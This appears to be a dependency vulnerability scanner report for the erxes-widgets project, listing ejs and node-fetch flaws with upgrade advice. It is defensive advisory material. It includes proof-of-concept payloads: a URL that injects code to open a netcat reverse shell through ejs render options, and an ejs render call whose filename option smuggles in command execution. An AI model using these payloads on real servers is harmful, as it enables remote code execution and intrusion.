Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4Remediation: Upgrade to ejs@3.1.7.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Remote Code Execution (RCE) by passing an unrestricted render option via the view options
parameter of renderFile
, which makes it possible to inject code into outputFunctionName
.
Note: This vulnerability is exploitable only if the server is already vulnerable to Prototype Pollution.
PoC:
Creation of reverse shell:
http://localhost:3000/page?id=2&settings[view options][outputFunctionName]=x;process.mainModule.require('child_process').execSync('nc -e sh 127.0.0.1 1337');s
Remediation
Upgrade ejs
to version 3.1.7 or higher.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react@16.5.0.
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Information Exposure when fetching a remote url with Cookie, if it get a Location
response header, it will follow that url and try to fetch that url with provided cookie. This can lead to forwarding secure headers to 3th party.
Remediation
Upgrade node-fetch
to version 2.6.7, 3.1.1 or higher.
References
medium severity
- Vulnerable module: node-fetch
- Introduced through: react@16.4.2 and react-dom@16.4.2
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react@16.5.0.
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › react-dom@16.4.2 › fbjs@0.8.18 › isomorphic-fetch@2.2.1 › node-fetch@1.7.3Remediation: Upgrade to react-dom@16.5.0.
Overview
node-fetch is a light-weight module that brings window.fetch to node.js
Affected versions of this package are vulnerable to Denial of Service. Node Fetch did not honor the size
option after following a redirect, which means that when a content size was over the limit, a FetchError would never get thrown and the process would end without failure.
Remediation
Upgrade node-fetch
to version 2.6.1, 3.0.0-beta.9 or higher.
References
medium severity
- Vulnerable module: ejs
- Introduced through: ejs@2.7.4
Detailed paths
-
Introduced through: erxes-widgets@erxes/erxes-widgets#5d024d42cf1abb6f88ab4f18211054515b95d17e › ejs@2.7.4Remediation: Upgrade to ejs@3.1.6.
Overview
ejs is a popular JavaScript templating engine.
Affected versions of this package are vulnerable to Arbitrary Code Injection via the render
and renderFile
. If external input is flowing into the options
parameter, an attacker is able run arbitrary code. This include the filename
, compileDebug
, and client
option.
POC
let ejs = require('ejs')
ejs.render('./views/test.ejs',{
filename:'/etc/passwd\nfinally { this.global.process.mainModule.require(\'child_process\').execSync(\'touch EJS_HACKED\') }',
compileDebug: true,
message: 'test',
client: true
})
Remediation
Upgrade ejs
to version 3.1.6 or higher.